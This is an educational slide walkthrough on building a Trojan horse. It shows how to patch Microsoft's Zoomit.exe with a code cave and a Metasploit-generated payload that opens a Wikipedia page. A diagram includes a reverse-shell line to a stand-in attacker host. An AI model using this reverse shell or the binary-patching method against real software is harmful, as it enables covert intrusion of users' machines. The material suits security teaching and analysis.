MALWARE DEVELOPMENT

TROJAN HORSE

By,
Jephin john
 INTRODUCTION
Malware Development serves a crucial role in
letting the good guys in cybersecurity, the
Redteamers, Blueteamers, Malware Analysts, to
understand the core funtionalities and execution
methods of a malicious software.

By understanding how the malicious software is

developed, the Cybersecurity industry could be
prepare Rules and Strategies to effectively defend
against them.

Some of the dangerous malwares includes

Polymorphic Viruses, which are malware that
could change their code upon execution, changing
their signatures, making it difficult to identify
them.

Malware development provides effective

understanding of how malware works and lets the
professionals to set effective countermeasures
against them.

This work is meant for educational purposes only,

I do not take any responsibility for utilizing the
knowledge for performing any sort of malicious
activity.
 I. What is a Trojan horse ?
A Trojan Horse is a type of malware that downloads onto a
computer disguised as a legitimate program. The delivery
method typically sees an attacker use social engineering to
hide malicious code within legitimate software to try and gain
users' system access with their software.

II. How does a Trojan Horse

Work?

trojan.exe (Portable Executable)

1. JUMP to 4. Execute
Legitimate Code:
Code Cave Legitimate Code
int main(){
printf(“Hello Jephin”);
}

return 0;

Code Cave:
Malicious code
bash -i >&
/dev/tcp/attacker.com/900
1 0>&1
.
.

3. Now JUMP to
2. Execute
Legitimate Code
Malicious Code

1
III. Trojan Horse Project
In this project, the Zoomit.exe which is a 32 bit executable
belonging to the Microsoft Sysinternals Suite is
reverse engineered to become a Trojan Horse.

The AIM of the project is to let the program execute the

legitimate code , which is performing the zoom functionalities
of the sysinternal suite, along with the execution of malicious
code, which is redirection to the web page
“https://en.wikipedia.org/wiki/Trojan_Horse“ .

III a. Tools and Technologies utilized

KALI LINUX MICROSOFT WINDOWS

METASPLOIT FRAMEWORK X32 DBG DEBUGGER

2
III b. Generate the payload using
Metasploit Framework

Metasploit Framework have been utilized to generate a raw

windows executable binary, which is named as payload.bin .

The malicious command that is present in the executable is

cmd.exe /c start /max https://en.wikipedia.org/wiki/Trojan_Horse
The Exitfunction is set to THREAD ,in order to spawn as a thread
within the process.

The payload generated in KALI LINUX , demonstrates how an

action or a set of instructions intended by the attacker could be
executed by masquerading within a legitimate executable.

3
III c. Taking a look at the HEXCODE of
the payload.bin

What we are looking at during this point, is the HEXCODE

Breakdown along with the ASCII contents using xxd in linux.

This is the Binary that needs to be inserted into the legitimate

program in order to make possible the execution of the
malicious instructions.

Also take note of the null value to the end of the HEXCODE
“00” as it marks the end of our program.

4
III d. Taking a look at the target
executable “Zoomit.exe” in the
target Windows machine.

Payload.bin
Zoomit.exe

The payload.bin has been copied to our target windows

machine. The target executable “Zoomit.exe” is also present
within the same directory.

As you can see, Zoomit.exe is a legitimate executable with its

intended functionality being displayed as the application
window is open to the right end of the screenshot.

5
III e. Loading Zoomit.exe in x32dbg

Program
Memory Entry point
address

The entry point and its corresponding memory address is

indicated in the above screenshot. The instructions following the
Entry point is the legitimate code.

Our intention is to JUMP from this address straight to our code

cave, which a sequence of NULL bytes where we could enter our
malicious code.

6
III f. JUMP straight to the Code Cave
from the entry point

Program
Memory Entry point
address
(OOAO82E3)

jmp 00A33AD1
(JUMP to Codecave at
start itself)

The address 00A33AD1 is the memory address of the start of the

code cave, the jmp 00A33AD1 instruction lets the control of the
program to directly jump from the entry point execution to the
start of the code cave.

And we could inject our malicious code within the code cave and
let the program execute those instructions first.

7
III g. Enter the PUSHAD and PUSHFD
instructions at the beginning of the
code cave.

PUSHAD and
PUSHFD
instruction at
beginning of
the code cave
CODE
CAVE

The PUSHAD and PUSHFD instructions are inserted into the

beginning of the code cave. The JUMP from entry point is
straight to the PUSHAD instruction. What these instructions
does is it PUSHES the flag registers, so that we could let the
CPU execute out malicious code.

Right after the PUSHFD instruction, we insert our malcious

HEXCODE in the vast empty CODE CAVE.

8
III h. Insert the malicious HEXCODE
into the actual code cave

Malicious
Code

NULL BYTE
(0000)

The malicious HEXCODE that we say initially in Kali Linux have

been copied to the code cave. Now the CPU has the HEXCODE
it requires to execute.

Next we need to add some last instructions to wrap up the

code cave and JUMP back to the initial entry point to continue
the regular execution of the program.

Dont enter the next instructions over the the NULL Byte, leave
it there, as it marks the end of our payload.bin .

9
III i. Add the POPFD and POPAD
instruction and JUMP back to
entry point

POPFD and POPAD

instruction

Call the entry point

function and JUMP
to address right
after entrypoint

The POPFD and POPAD instruction are entered after NULL

Byte of the HEXCODE in order to release the registers after
execution.

The call instruction to the regular program of the entry point is

made right after POPAD and the JUMP instruction to the
address right after the entry point is also set to continue
normal execution of the application.

10
III i. Patching the Zoomit.exe file

The .exe is patched.

The executable is patched by clicking the patch button on the

debugger. This is done in order to ensure the application
executes with the newly added instructions.

The patched exe was found to have some bugs. So that should
also be fixed.

11
III j. Fixing the bugs and patching the
file again

The .exe is patched.

The bug was with the PUSH 0 instruction, it was fixed by

changing the instruction from PUSH 0 to JMP POPFD_address.
Now instead of PUSH 0, the control goes straight to the POPFD
instruction.

Now upon fixing the bugs , the executable is patched again and
generated executable is Zoomit-Trojan.exe .

12
III k. Taking a look at the Trojan and
Legitimate executable

Legitimate Trojan
executable executable

The legitimate and malicious executables looks identical,

except for the naming ofcourse, which is intentional.

Now let us go ahead and Execute the Trojan horse.

13
III l. Executing the Zoomit-Trojan.exe

Malicious execution
occured!!!

Legitimate functions
are executing in
parallel

As you can see, the legitimate functionality of the Zoomit.exe is

being executed in parallel to the execution of malicious code,
which is opening up the Trojan Horse Wikipedia page.

14
THE END